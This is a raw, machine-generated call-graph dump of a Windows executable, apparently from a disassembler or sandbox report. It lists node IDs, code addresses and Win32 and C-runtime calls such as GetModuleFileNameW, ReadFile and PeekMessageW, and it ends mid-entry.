82193->82104 82194->82106 82370 40e6e0 82195->82370 82199 401f41 GetModuleFileNameW 82388 410100 82199->82388 82201 401f5c 82400 410960 82201->82400 82204 401b10 52 API calls 82205 401f81 82204->82205 82403 401980 82205->82403 82207 401f8e 82208 408f40 VariantClear 82207->82208 82209 401f9d 82208->82209 82210 401b10 52 API calls 82209->82210 82211 401fb4 82210->82211 82212 401980 53 API calls 82211->82212 82213 401fc3 82212->82213 82214 401b10 52 API calls 82213->82214 82215 401fd2 82214->82215 82216 40c2c0 52 API calls 82215->82216 82217 401fe1 82216->82217 82218 40bc70 52 API calls 82217->82218 82219 401ff3 82218->82219 82411 401a10 82219->82411 82221 401ffe 82418 4114ab 82221->82418 82224 428b05 82227 401a10 52 API calls 82224->82227 82225 402017 82226 4114ab __wcsicoll 58 API calls 82225->82226 82229 402022 82226->82229 82228 428b18 82227->82228 82231 401a10 52 API calls 82228->82231 82229->82228 82230 40202d 82229->82230 82232 4114ab __wcsicoll 58 API calls 82230->82232 82233 428b33 82231->82233 82234 402038 82232->82234 82236 428b3b GetModuleFileNameW 82233->82236 82235 402043 82234->82235 82234->82236 82237 4114ab __wcsicoll 58 API calls 82235->82237 82238 401a10 52 API calls 82236->82238 82239 40204e 82237->82239 82240 428b6c 82238->82240 82241 402092 82239->82241 82244 428b90 _wcscpy 82239->82244 82247 401a10 52 API calls 82239->82247 82430 40e0a0 52 API calls 82240->82430 82243 4020a3 82241->82243 82241->82244 82246 428bc6 82243->82246 82426 40e830 53 API calls 82243->82426 82252 401a10 52 API calls 82244->82252 82245 428b7a 82248 401a10 52 API calls 82245->82248 82250 402073 _wcscpy 82247->82250 82251 428b88 82248->82251 82256 401a10 52 API calls 82250->82256 82251->82244 82260 4020d0 82252->82260 82253 4020bb 82427 40cf00 53 API calls 82253->82427 82255 4020c6 82257 408f40 VariantClear 82255->82257 82256->82241 82257->82260 82258 402110 82262 408f40 VariantClear 82258->82262 82260->82258 82263 401a10 52 API calls 82260->82263 82428 40cf00 53 API calls 82260->82428 82429 40e6a0 53 API calls 82260->82429 82264 402120 ctype 82262->82264 82263->82260 82264->82110 82266 4295c9 setSBCS 82265->82266 82267 40f53c 82265->82267 82269 4295d9 GetOpenFileNameW 82266->82269 83167 410120 82267->83167 82269->82267 82271 40d5f5 82269->82271 82270 40f545 83171 4102b0 SHGetMalloc 82270->83171 82271->82118 82271->82120 82273 40f54c 83176 410190 GetFullPathNameW 82273->83176 82275 40f559 83187 40f570 82275->83187 83229 402400 82277->83229 82279 40146f 82283 428c29 _wcscat 82279->82283 83238 401500 82279->83238 82281 40147c 82281->82283 83246 40d440 82281->83246 82284 401489 82284->82283 82285 401491 GetFullPathNameW 82284->82285 82286 402160 52 API calls 82285->82286 82287 4014bb 82286->82287 82288 402160 52 API calls 82287->82288 82289 4014c8 82288->82289 82289->82283 82290 402160 52 API calls 82289->82290 82291 4014ee 82290->82291 82291->82120 82293 428361 82292->82293 82294 4103fc LoadImageW RegisterClassExW 82292->82294 83268 44395e EnumResourceNamesW LoadImageW 82293->83268 83267 410490 7 API calls 82294->83267 82297 40d651 82299 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 82297->82299 82298 428368 82299->82130 82301 409202 82300->82301 82302 42d7ad 82300->82302 82343 409216 ctype 82301->82343 83414 410940 391 API calls 82301->83414 83417 45e737 90 API calls 3 library calls 82302->83417 82305 409386 82306 40939c 82305->82306 83415 40f190 10 API calls 82305->83415 82306->82135 82367 401000 Shell_NotifyIconW setSBCS 82306->82367 82308 4095b2 82308->82306 82309 4095bf 82308->82309 83416 401a50 391 API calls 82309->83416 82310 409253 PeekMessageW 82310->82343 82312 42d8cd Sleep 82312->82343 82313 4095c6 LockWindowUpdate DestroyWindow GetMessageW 82313->82306 82316 4095f9 82313->82316 82315 42e13b 83443 40d410 VariantClear 82315->83443 82318 42e158 TranslateMessage DispatchMessageW GetMessageW 82316->82318 82318->82318 82321 42e188 82318->82321 82320 409567 PeekMessageW 82320->82343 82321->82306 82324 44c29d 52 API calls 82351 42da45 82324->82351 82325 46f3c1 107 API calls 82325->82343 82327 46fdbf 108 API calls 82327->82351 82328 409551 TranslateMessage DispatchMessageW 82328->82320 82330 42dcd2 WaitForSingleObject 82332 42dcf0 GetExitCodeProcess CloseHandle 82330->82332 82330->82343 82331 42dd3d Sleep 82331->82351 83424 40d410 VariantClear 82332->83424 82333 40c620 timeGetTime 82333->82343 82336 4094cf Sleep 82336->82343 82339 40d410 VariantClear 82339->82343 82341 42d94d timeGetTime 83420 465124 53 API calls 82341->83420 82343->82305 82343->82310 82343->82312 82343->82315 82343->82320 82343->82325 82343->82328 82343->82330 82343->82331 82343->82333 82343->82336 82343->82339 82343->82341 82345 47d33e 369 API calls 82343->82345 82343->82351 82359 42e0cc VariantClear 82343->82359 82360 45e737 90 API calls 82343->82360 82361 408f40 VariantClear 82343->82361 83269 4091b0 82343->83269 83327 40afa0 82343->83327 83353 408fc0 82343->83353 83388 408cc0 82343->83388 83402 40d150 82343->83402 83407 40d170 82343->83407 83413 4096a0 391 API calls 4 library calls 82343->83413 83418 465124 53 API calls 82343->83418 83419 40e0a0 52 API calls 82343->83419 83442 40e270 VariantClear ctype 82343->83442 82345->82343 82346 42dd89 CloseHandle 82346->82351 82348 408f40 VariantClear 82348->82351 82349 465124 53 API calls 82349->82351 82350 42de19 GetExitCodeProcess CloseHandle 82350->82351 82351->82324 82351->82327 82351->82343 82351->82346 82351->82348 82351->82349 82351->82350 82354 42de88 Sleep 82351->82354 82363 401980 53 API calls 82351->82363 82364 401b10 52 API calls 82351->82364 83421 45178a 54 API calls 82351->83421 83422 47d33e 391 API calls 82351->83422 83423 453bc6 54 API calls 82351->83423 83425 40c620 timeGetTime 82351->83425 83426 40d410 VariantClear 82351->83426 83427 443d19 82351->83427 83435 4574b4 VariantClear 82351->83435 83436 403cd0 82351->83436 83440 4731e1 VariantClear 82351->83440 83441 4331a2 6 API calls 82351->83441 82354->82343 82359->82343 82360->82343 82361->82343 82363->82351 82364->82351 82366->82134 82367->82135 82368->82120 82369->82127 82371 40bc70 52 API calls 82370->82371 82372 401f31 82371->82372 82373 402560 82372->82373 82374 40256d __write_nolock 82373->82374 82375 402160 52 API calls 82374->82375 82377 402593 82375->82377 82387 4025bd 82377->82387 82431 401c90 82377->82431 82378 4026f0 52 API calls 82378->82387 82379 4026a7 82380 401b10 52 API calls 82379->82380 82386 4026db 82379->82386 82382 4026d1 82380->82382 82381 401b10 52 API calls 82381->82387 82435 40d7c0 52 API calls 2 library calls 82382->82435 82384 401c90 52 API calls 82384->82387 82386->82199 82387->82378 82387->82379 82387->82381 82387->82384 82434 40d7c0 52 API calls 2 library calls 82387->82434 82436 40f760 82388->82436 82391 410118 82391->82201 82393 42805d 82394 42806a 82393->82394 82492 431e58 82393->82492 82396 413748 _free 46 API calls 82394->82396 82397 428078 82396->82397 82398 431e58 82 API calls 82397->82398 82399 428084 82398->82399 82399->82201 82401 4115d7 52 API calls 82400->82401 82402 401f74 82401->82402 82402->82204 82404 4019a3 82403->82404 82408 401985 82403->82408 82405 4019b8 82404->82405 82404->82408 83162 403e10 53 API calls 82405->83162 82406 40199f 82406->82207 82408->82406 83161 403e10 53 API calls 82408->83161 82410 4019c4 82410->82207 82412 401a30 82411->82412 82413 401a17 82411->82413 82415 402160 52 API calls 82412->82415 82414 401a2d 82413->82414 83163 403c30 52 API calls _memmove 82413->83163 82414->82221 82417 401a3d 82415->82417 82417->82221 82419 411523 82418->82419 82420 4114ba 82418->82420 83166 4113a8 58 API calls 3 library calls 82419->83166 82425 40200c 82420->82425 83164 417f77 46 API calls __getptd_noexit 82420->83164 82423 4114c6 83165 417f25 10 API calls __read_nolock 82423->83165 82425->82224 82425->82225 82426->82253 82427->82255 82428->82260 82429->82260 82430->82245 82432 4026f0 52 API calls 82431->82432 82433 401c97 82432->82433 82433->82377 82434->82387 82435->82386 82496 40f6f0 82436->82496 82438 40f77b _strcat ctype 82504 40f850 82438->82504 82443 427c2a 82533 414d04 82443->82533 82445 40f7fc 82445->82443 82446 40f804 82445->82446 82520 414a46 82446->82520 82450 40f80e 82450->82391 82455 4528bd 82450->82455 82452 427c59 82539 414fe2 82452->82539 82454 427c79 82456 4150d1 _fseek 81 API calls 82455->82456 82457 452930 82456->82457 83063 452719 82457->83063 82460 452948 82460->82393 82461 414d04 __fread_nolock 61 API calls 82462 452966 82461->82462 82463 414d04 __fread_nolock 61 API calls 82462->82463 82464 452976 82463->82464 82465 414d04 __fread_nolock 61 API calls 82464->82465 82466 45298f 82465->82466 82467 414d04 __fread_nolock 61 API calls 82466->82467 82468 4529aa 82467->82468 82469 4150d1 _fseek 81 API calls 82468->82469 82470 4529c4 82469->82470 82471 4135bb _malloc 46 API calls 82470->82471 82472 4529cf 82471->82472 82473 4135bb _malloc 46 API calls 82472->82473 82474 4529db 82473->82474 82475 414d04 __fread_nolock 61 API calls 82474->82475 82476 4529ec 82475->82476 82477 44afef GetSystemTimeAsFileTime 82476->82477 82478 452a00 82477->82478 82479 452a36 82478->82479 82480 452a13 82478->82480 82482 452aa5 82479->82482 82483 452a3c 82479->82483 82481 413748 _free 46 API calls 82480->82481 82484 452a1c 82481->82484 82486 413748 _free 46 API calls 82482->82486 83069 44b1a9 82483->83069 82487 413748 _free 46 API calls 82484->82487 82489 452aa3 82486->82489 82490 452a25 82487->82490 82488 452a9d 82491 413748 _free 46 API calls 82488->82491 82489->82393 82490->82393 82491->82489 82493 431e64 82492->82493 82494 431e6a 82492->82494 82495 414a46 __fcloseall 82 API calls 82493->82495 82494->82394 82495->82494 82497 425de2 82496->82497 82498 40f6fc _wcslen 82496->82498 82497->82438 82499 40f710 WideCharToMultiByte 82498->82499 82500 40f756 82499->82500 82501 40f728 82499->82501 82500->82438 82502 4115d7 52 API calls 82501->82502 82503 40f735 WideCharToMultiByte 82502->82503 82503->82438 82506 40f85d setSBCS _strlen 82504->82506 82507 40f7ab 82506->82507 82552 414db8 82506->82552 82508 4149c2 82507->82508 82567 414904 82508->82567 82510 40f7e9 82510->82443 82511 40f5c0 82510->82511 82516 40f5cd _strcat __write_nolock _memmove 82511->82516 82512 414d04 __fread_nolock 61 API calls 82512->82516 82514 425d11 82515 4150d1 _fseek 81 API calls 82514->82515 82517 425d33 82515->82517 82516->82512 82516->82514 82519 40f691 __tzset_nolock 82516->82519 82655 4150d1 82516->82655 82518 414d04 __fread_nolock 61 API calls 82517->82518 82518->82519 82519->82445 82521 414a52 __tzset_nolock 82520->82521 82522 414a64 82521->82522 82523 414a79 82521->82523 82819 417f77 46 API calls __getptd_noexit 82522->82819 82526 415471 __lock_file 47 API calls 82523->82526 82529 414a74 __tzset_nolock 82523->82529 82525 414a69 82820 417f25 10 API calls __read_nolock 82525->82820 82528 414a92 82526->82528 82803 4149d9 82528->82803 82529->82450 82888 414c76 82533->82888 82535 414d1c 82536 44afef 82535->82536 83056 442c5a 82536->83056 82538 44b00d 82538->82452 82540 414fee __tzset_nolock 82539->82540 82541 414ffa 82540->82541 82542 41500f 82540->82542 83060 417f77 46 API calls __getptd_noexit 82541->83060 82543 415471 __lock_file 47 API calls 82542->82543 82545 415017 82543->82545 82547 414e4e __ftell_nolock 51 API calls 82545->82547 82546 414fff 83061 417f25 10 API calls __read_nolock 82546->83061 82549 415024 82547->82549 83062 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 82549->83062 82550 41500a __tzset_nolock 82550->82454 82553 414dd6 82552->82553 82554 414deb 82552->82554 82563 417f77 46 API calls __getptd_noexit 82553->82563 82554->82553 82555 414df2 82554->82555 82565 41b91b 79 API calls 12 library calls 82555->82565 82558 414ddb 82564 417f25 10 API calls __read_nolock 82558->82564 82559 414e18 82561 414de6 82559->82561 82566 418f98 77 API calls 6 library calls 82559->82566 82561->82506 82563->82558 82564->82561 82565->82559 82566->82561 82570 414910 __tzset_nolock 82567->82570 82568 414923 82623 417f77 46 API calls __getptd_noexit 82568->82623 82570->82568 82572 414951 82570->82572 82571 414928 82624 417f25 10 API calls __read_nolock 82571->82624 82586 41d4d1 82572->82586 82575 414956 82576 41496a 82575->82576 82577 41495d 82575->82577 82578 414992 82576->82578 82579 414972 82576->82579 82625 417f77 46 API calls __getptd_noexit 82577->82625 82603 41d218 82578->82603 82626 417f77 46 API calls __getptd_noexit 82579->82626 82583 414933 __tzset_nolock @_EH4_CallFilterFunc@8 82583->82510 82587 41d4dd __tzset_nolock 82586->82587 82588 4182cb __lock 46 API calls 82587->82588 82589 41d4eb 82588->82589 82590 41d567 82589->82590 82598 418209 __mtinitlocknum 46 API calls 82589->82598 82601 41d560 82589->82601 82631 4154b2 47 API calls __lock 82589->82631 82632 415520 LeaveCriticalSection LeaveCriticalSection _doexit 82589->82632 82592 416b04 __malloc_crt 46 API calls 82590->82592 82594 41d56e 82592->82594 82593 41d5f0 __tzset_nolock 82593->82575 82595 41d57c InitializeCriticalSectionAndSpinCount 82594->82595 82594->82601 82596 41d59c 82595->82596 82597 41d5af EnterCriticalSection 82595->82597 82600 413748 _free 46 API calls 82596->82600 82597->82601 82598->82589 82600->82601 82628 41d5fb 82601->82628 82605 41d23a 82603->82605 82604 41d26c __wopenfile 82610 41d47a 82604->82610 82622 41d421 82604->82622 82639 41341f 58 API calls 2 library calls 82604->82639 82605->82604 82606 41d255 82605->82606 82637 417f77 46 API calls __getptd_noexit 82606->82637 82608 41d25a 82638 417f25 10 API calls __read_nolock 82608->82638 82642 417f77 46 API calls __getptd_noexit 82610->82642 82611 41d48c 82634 422bf9 82611->82634 82613 41499d 82627 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 82613->82627 82615 41d47f 82643 417f25 10 API calls __read_nolock 82615->82643 82618 41d41a 82618->82622 82640 41341f 58 API calls 2 library calls 82618->82640 82620 41d439 82620->82622 82641 41341f 58 API calls 2 library calls 82620->82641 82622->82610 82622->82611 82623->82571 82624->82583 82625->82583 82626->82583 82627->82583 82633 4181f2 LeaveCriticalSection 82628->82633 82630 41d602 82630->82593 82631->82589 82632->82589 82633->82630 82644 422b35 82634->82644 82636 422c14 82636->82613 82637->82608 82638->82613 82639->82618 82640->82620 82641->82622 82642->82615 82643->82613 82647 422b41 __tzset_nolock 82644->82647 82645 422b54 82646 417f77 __read_nolock 46 API calls 82645->82646 82648 422b59 82646->82648 82647->82645 82649 422b8a 82647->82649 82650 417f25 __read_nolock 10 API calls 82648->82650 82651 422400 __tsopen_nolock 109 API calls 82649->82651 82654 422b63 __tzset_nolock 82650->82654 82652 422ba4 82651->82652 82653 422bcb __wsopen_helper LeaveCriticalSection 82652->82653 82653->82654 82654->82636 82658 4150dd __tzset_nolock 82655->82658 82656 4150e9 82686 417f77 46 API calls __getptd_noexit 82656->82686 82658->82656 82659 41510f 82658->82659 82668 415471 82659->82668 82660 4150ee 82687 417f25 10 API calls __read_nolock 82660->82687 82667 4150f9 __tzset_nolock 82667->82516 82669 415483 82668->82669 82670 4154a5 EnterCriticalSection 82668->82670 82669->82670 82672 41548b 82669->82672 82671 415117 82670->82671 82674 415047 82671->82674 82673 4182cb __lock 46 API calls 82672->82673 82673->82671 82675 415067 82674->82675 82676 415057 82674->82676 82681 415079 82675->82681 82689 414e4e 82675->82689 82744 417f77 46 API calls __getptd_noexit 82676->82744 82680 41505c 82688 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 82680->82688 82706 41443c 82681->82706 82684 4150b9 82719 41e1f4 82684->82719 82686->82660 82687->82667 82688->82667 82690 414e61 82689->82690 82691 414e79 82689->82691 82745 417f77 46 API calls __getptd_noexit 82690->82745 82693 414139 __filbuf 46 API calls 82691->82693 82695 414e80 82693->82695 82694 414e66 82746 417f25 10 API calls __read_nolock 82694->82746 82697 41e1f4 __write 51 API calls 82695->82697 82698 414e97 82697->82698 82699 414f09 82698->82699 82701 414ec9 82698->82701 82705 414e71 82698->82705 82747 417f77 46 API calls __getptd_noexit 82699->82747 82702 41e1f4 __write 51 API calls 82701->82702 82701->82705 82703 414f64 82702->82703 82704 41e1f4 __write 51 API calls 82703->82704 82703->82705 82704->82705 82705->82681 82707 414455 82706->82707 82711 414477 82706->82711 82708 414139 __filbuf 46 API calls 82707->82708 82707->82711 82709 414470 82708->82709 82748 41b7b2 82709->82748 82712 414139 82711->82712 82713 414145 82712->82713 82714 41415a 82712->82714 82773 417f77 46 API calls __getptd_noexit 82713->82773 82714->82684 82716 41414a 82774 417f25 10 API calls __read_nolock 82716->82774 82718 414155 82718->82684 82720 41e200 __tzset_nolock 82719->82720 82721 41e223 82720->82721 82722 41e208 82720->82722 82724 41e22f 82721->82724 82727 41e269 82721->82727 82795 417f8a 46 API calls __getptd_noexit 82722->82795 82797 417f8a 46 API calls __getptd_noexit 82724->82797 82725 41e20d 82796 417f77 46 API calls __getptd_noexit 82725->82796 82775 41ae56 82727->82775 82729 41e234 82798 417f77 46 API calls __getptd_noexit 82729->82798 82732 41e26f 82734 41e291 82732->82734 82735 41e27d 82732->82735 82733 41e23c 82799 417f25 10 API calls __read_nolock 82733->82799 82800 417f77 46 API calls __getptd_noexit 82734->82800 82785 41e17f 82735->82785 82739 41e289 82802 41e2c0 LeaveCriticalSection __unlock_fhandle 82739->82802 82740 41e296 82801 417f8a 46 API calls __getptd_noexit 82740->82801 82743 41e215 __tzset_nolock 82743->82680 82744->82680 82745->82694 82746->82705 82747->82705 82749 41b7be __tzset_nolock 82748->82749 82750 41b7e1 82749->82750 82751 41b7c6 82749->82751 82753 41b7ed 82750->82753 82756 41b827 82750->82756 82752 417f8a __read_nolock 46 API calls 82751->82752 82754 41b7cb 82752->82754 82755 417f8a __read_nolock 46 API calls 82753->82755 82757 417f77 __read_nolock 46 API calls 82754->82757 82758 41b7f2 82755->82758 82760 41ae56 ___lock_fhandle 48 API calls 82756->82760 82766 41b7d3 __tzset_nolock 82757->82766 82759 417f77 __read_nolock 46 API calls 82758->82759 82761 41b7fa 82759->82761 82762 41b82d 82760->82762 82763 417f25 __read_nolock 10 API calls 82761->82763 82764 41b83b 82762->82764 82765 41b84f 82762->82765 82763->82766 82767 41b0b5 __write_nolock 74 API calls 82764->82767 82768 417f77 __read_nolock 46 API calls 82765->82768 82766->82711 82769 41b847 82767->82769 82770 41b854 82768->82770 82772 41b87e __write LeaveCriticalSection 82769->82772 82771 417f8a __read_nolock 46 API calls 82770->82771 82771->82769 82772->82766 82773->82716 82774->82718 82776 41ae62 __tzset_nolock 82775->82776 82777 41aebc 82776->82777 82780 4182cb __lock 46 API calls 82776->82780 82778 41aec1 EnterCriticalSection 82777->82778 82779 41aede __tzset_nolock 82777->82779 82778->82779 82779->82732 82781 41ae8e 82780->82781 82782 41aeaa 82781->82782 82783 41ae97 InitializeCriticalSectionAndSpinCount 82781->82783 82784 41aeec ___lock_fhandle LeaveCriticalSection 82782->82784 82783->82782 82784->82777 82786 41aded __chsize_nolock 46 API calls 82785->82786 82787 41e18e 82786->82787 82788 41e1a4 SetFilePointer 82787->82788 82789 41e194 82787->82789 82791 41e1bb GetLastError 82788->82791 82792 41e1c3 82788->82792 82790 417f77 __read_nolock 46 API calls 82789->82790 82793 41e199 82790->82793 82791->82792 82792->82793 82794 417f9d __dosmaperr 46 API calls 82792->82794 82793->82739 82794->82793 82795->82725 82796->82743 82797->82729 82798->82733 82799->82743 82800->82740 82801->82739 82802->82743 82804 4149ea 82803->82804 82805 4149fe 82803->82805 82849 417f77 46 API calls __getptd_noexit 82804->82849 82808 41443c __flush 77 API calls 82805->82808 82817 4149fa 82805->82817 82807 4149ef 82850 417f25 10 API calls __read_nolock 82807->82850 82810 414a0a 82808->82810 82822 41d8c2 82810->82822 82813 414139 __filbuf 46 API calls 82814 414a18 82813->82814 82826 41d7fe 82814->82826 82816 414a1e 82816->82817 82818 413748 _free 46 API calls 82816->82818 82821 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 82817->82821 82818->82817 82819->82525 82820->82529 82821->82529 82823 414a12 82822->82823 82824 41d8d2 82822->82824 82823->82813 82824->82823 82825 413748 _free 46 API calls 82824->82825 82825->82823 82827 41d80a __tzset_nolock 82826->82827 82828 41d812 82827->82828 82829 41d82d 82827->82829 82866 417f8a 46 API calls __getptd_noexit 82828->82866 82831 41d839 82829->82831 82835 41d873 82829->82835 82868 417f8a 46 API calls __getptd_noexit 82831->82868 82833 41d817 82867 417f77 46 API calls __getptd_noexit 82833->82867 82834 41d83e 82869 417f77 46 API calls __getptd_noexit 82834->82869 82838 41ae56 ___lock_fhandle 48 API calls 82835->82838 82840 41d879 82838->82840 82839 41d846 82870 417f25 10 API calls __read_nolock 82839->82870 82842 41d893 82840->82842 82843 41d887 82840->82843 82871 417f77 46 API calls __getptd_noexit 82842->82871 82851 41d762 82843->82851 82844 41d81f __tzset_nolock 82844->82816 82847 41d88d 82872 41d8ba LeaveCriticalSection __unlock_fhandle 82847->82872 82849->82807 82850->82817 82873 41aded 82851->82873 82853 41d7c8 82886 41ad67 47 API calls __read_nolock 82853->82886 82855 41d772 82855->82853 82856 41aded __chsize_nolock 46 API calls 82855->82856 82864 41d7a6 82855->82864 82859 41d79d 82856->82859 82857 41aded __chsize_nolock 46 API calls 82860 41d7b2 CloseHandle 82857->82860 82858 41d7d0 82865 41d7f2 82858->82865 82887 417f9d 46 API calls 2 library calls 82858->82887 82861 41aded __chsize_nolock 46 API calls 82859->82861 82860->82853 82862 41d7be GetLastError 82860->82862 82861->82864 82862->82853 82864->82853 82864->82857 82865->82847 82866->82833 82867->82844 82868->82834 82869->82839 82870->82844 82871->82847 82872->82844 82874 41ae12 82873->82874 82875 41adfa 82873->82875 82878 417f8a __read_nolock 46 API calls 82874->82878 82879 41ae51 82874->82879 82876 417f8a __read_nolock 46 API calls 82875->82876 82877 41adff 82876->82877 82880 417f77 __read_nolock 46 API calls 82877->82880 82881 41ae23 82878->82881 82879->82855 82882 41ae07 82880->82882 82883 417f77 __read_nolock 46 API calls 82881->82883 82882->82855 82884 41ae2b 82883->82884 82885 417f25 __read_nolock 10 API calls 82884->82885 82885->82882 82886->82858 82887->82865 82889 414c82 __tzset_nolock 82888->82889 82890 414cc3 82889->82890 82891 414c96 setSBCS 82889->82891 82892 414cbb __tzset_nolock 82889->82892 82893 415471 __lock_file 47 API calls 82890->82893 82915 417f77 46 API calls __getptd_noexit 82891->82915 82892->82535 82895 414ccb 82893->82895 82901 414aba 82895->82901 82896 414cb0 82916 417f25 10 API calls __read_nolock 82896->82916 82902 414ad8 setSBCS 82901->82902 82906 414af2 82901->82906 82903 414ae2 82902->82903 82902->82906 82909 414b2d 82902->82909 82968 417f77 46 API calls __getptd_noexit 82903->82968 82917 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 82906->82917 82908 414c38 setSBCS 82971 417f77 46 API calls __getptd_noexit 82908->82971 82909->82906 82909->82908 82910 414139 __filbuf 46 API calls 82909->82910 82918 41dfcc 82909->82918 82948 41d8f3 82909->82948 82970 41e0c2 46 API calls 3 library calls 82909->82970 82910->82909 82914 414ae7 82969 417f25 10 API calls __read_nolock 82914->82969 82915->82896 82916->82892 82917->82892 82919 41dfd8 __tzset_nolock 82918->82919 82920 41dfe0 82919->82920 82921 41dffb 82919->82921 83041 417f8a 46 API calls __getptd_noexit 82920->83041 82922 41e007 82921->82922 82928 41e041 82921->82928 83043 417f8a 46 API calls __getptd_noexit 82922->83043 82925 41dfe5 83042 417f77 46 API calls __getptd_noexit 82925->83042 82927 41e00c 83044 417f77 46 API calls __getptd_noexit 82927->83044 82930 41e063 82928->82930 82931 41e04e 82928->82931 82933 41ae56 ___lock_fhandle 48 API calls 82930->82933 83046 417f8a 46 API calls __getptd_noexit 82931->83046 82936 41e069 82933->82936 82934 41e014 83045 417f25 10 API calls __read_nolock 82934->83045 82935 41e053 83047 417f77 46 API calls __getptd_noexit 82935->83047 82939 41e077 82936->82939 82940 41e08b 82936->82940 82938 41dfed __tzset_nolock 82938->82909 82972 41da15 82939->82972 83048 417f77 46 API calls __getptd_noexit 82940->83048 82944 41e083 83050 41e0ba LeaveCriticalSection __unlock_fhandle 82944->83050 82945 41e090 83049 417f8a 46 API calls __getptd_noexit 82945->83049 82949 41d900 82948->82949 82952 41d915 82948->82952 83054 417f77 46 API calls __getptd_noexit 82949->83054 82951 41d905 83055 417f25 10 API calls __read_nolock 82951->83055 82954 41d94a 82952->82954 82962 41d910 82952->82962 83051 420603 82952->83051 82956 414139 __filbuf 46 API calls 82954->82956 82957 41d95e 82956->82957 82958 41dfcc __read 59 API calls 82957->82958 82959 41d965 82958->82959 82960 414139 __filbuf 46 API calls 82959->82960 82959->82962 82961 41d988 82960->82961 82961->82962 82963 414139 __filbuf 46 API calls 82961->82963 82962->82909 82964 41d994 82963->82964 82964->82962 82965 414139 __filbuf 46 API calls 82964->82965 82966 41d9a1 82965->82966 82967 414139 __filbuf 46 API calls 82966->82967 82967->82962 82968->82914 82969->82906 82970->82909 82971->82914 82973 41da31 82972->82973 82974 41da4c 82972->82974 82976 417f8a __read_nolock 46 API calls 82973->82976 82975 41da5b 82974->82975 82978 41da7a 82974->82978 82979 417f8a __read_nolock 46 API calls 82975->82979 82977 41da36 82976->82977 82980 417f77 __read_nolock 46 API calls 82977->82980 82982 41da98 82978->82982 82993 41daac 82978->82993 82981 41da60 82979->82981 82994 41da3e 82980->82994 82984 417f77 __read_nolock 46 API calls 82981->82984 82985 417f8a __read_nolock 46 API calls 82982->82985 82983 41db02 82987 417f8a __read_nolock 46 API calls 82983->82987 82986 41da67 82984->82986 82988 41da9d 82985->82988 82990 417f25 __read_nolock 10 API calls 82986->82990 82991 41db07 82987->82991 82989 417f77 __read_nolock 46 API calls 82988->82989 82992 41daa4 82989->82992 82990->82994 82995 417f77 __read_nolock 46 API calls 82991->82995 82997 417f25 __read_nolock 10 API calls 82992->82997 82993->82983 82993->82994 82996 41dae1 82993->82996 82998 41db1b 82993->82998 82994->82944 82995->82992 82996->82983 83001 41daec ReadFile 82996->83001 82997->82994 83000 416b04 __malloc_crt 46 API calls 82998->83000 83002 41db31 83000->83002 83003 41dc17 83001->83003 83004 41df8f GetLastError 83001->83004 83007 41db59 83002->83007 83008 41db3b 83002->83008 83003->83004 83012 41dc2b 83003->83012 83005 41de16 83004->83005 83006 41df9c 83004->83006 83016 417f9d __dosmaperr 46 API calls 83005->83016 83020 41dd9b 83005->83020 83010 417f77 __read_nolock 46 API calls 83006->83010 83009 420494 __lseeki64_nolock 48 API calls 83007->83009 83011 417f77 __read_nolock 46 API calls 83008->83011 83013 41db67 83009->83013 83014 41dfa1 83010->83014 83015 41db40 83011->83015 83012->83020 83021 41dc47 83012->83021 83024 41de5b 83012->83024 83013->83001 83017 417f8a __read_nolock 46 API calls 83014->83017 83018 417f8a __read_nolock 46 API calls 83015->83018 83016->83020 83017->83020 83018->82994 83019 413748 _free 46 API calls 83019->82994 83020->82994 83020->83019 83022 41dcab ReadFile 83021->83022 83029 41dd28 83021->83029 83027 41dcc9 GetLastError 83022->83027 83032 41dcd3 83022->83032 83023 41ded0 ReadFile 83025 41deef GetLastError 83023->83025 83033 41def9 83023->83033 83024->83020 83024->83023 83025->83024 83025->83033 83026 41ddec MultiByteToWideChar 83026->83020 83028 41de10 GetLastError 83026->83028 83027->83021 83027->83032 83028->83005 83029->83020 83030 41dda3 83029->83030 83031 41dd96 83029->83031 83035 41dd60 83029->83035 83030->83035 83036 41ddda 83030->83036 83034 417f77 __read_nolock 46 API calls 83031->83034 83032->83021 83037 420494 __lseeki64_nolock 48 API calls 83032->83037 83033->83024 83038 420494 __lseeki64_nolock 48 API calls 83033->83038 83034->83020 83035->83026 83039 420494 __lseeki64_nolock 48 API calls 83036->83039 83037->83032 83038->83033 83040 41dde9 83039->83040 83040->83026 83041->82925 83042->82938 83043->82927 83044->82934 83045->82938 83046->82935 83047->82934 83048->82945 83049->82944 83050->82938 83052 416b04 __malloc_crt 46 API calls 83051->83052 83053 420618 83052->83053 83053->82954 83054->82951 83055->82962 83059 4148b3 GetSystemTimeAsFileTime __aulldiv 83056->83059 83058 442c6b 83058->82538 83059->83058 83060->82546 83061->82550 83062->82550 83067 45272f __tzset_nolock _wcscpy 83063->83067 83064 414d04 61 API calls __fread_nolock 83064->83067 83065 4528a4 83065->82460 83065->82461 83066 44afef GetSystemTimeAsFileTime 83066->83067 83067->83064 83067->83065 83067->83066 83068 4150d1 81 API calls _fseek 83067->83068 83068->83067 83070 44b1bc 83069->83070 83071 44b1ca 83069->83071 83072 4149c2 116 API calls 83070->83072 83073 44b1e1 83071->83073 83074 4149c2 116 API calls 83071->83074 83075 44b1d8 83071->83075 83072->83071 83104 4321a4 83073->83104 83077 44b2db 83074->83077 83075->82488 83077->83073 83079 44b2e9 83077->83079 83078 44b224 83080 44b253 83078->83080 83081 44b228 83078->83081 83082 44b2f6 83079->83082 83084 414a46 __fcloseall 82 API calls 83079->83084 83108 43213d 83080->83108 83083 44b235 83081->83083 83086 414a46 __fcloseall 82 API calls 83081->83086 83082->82488 83087 44b245 83083->83087 83089 414a46 __fcloseall 82 API calls 83083->83089 83084->83082 83086->83083 83087->82488 83088 44b25a 83090 44b260 83088->83090 83091 44b289 83088->83091 83089->83087 83092 44b26d 83090->83092 83094 414a46 __fcloseall 82 API calls 83090->83094 83118 44b0bf 83091->83118 83095 44b27d 83092->83095 83097 414a46 __fcloseall 82 API calls 83092->83097 83094->83092 83095->82488 83096 44b28f 83127 4320f8 83096->83127 83097->83095 83100 44b2a2 83101 44b2b2 83100->83101 83103 414a46 __fcloseall 82 API calls 83100->83103 83101->82488 83102 414a46 __fcloseall 82 API calls 83102->83100 83103->83101 83105 4321cb 83104->83105 83107 4321b4 __tzset_nolock _memmove 83104->83107 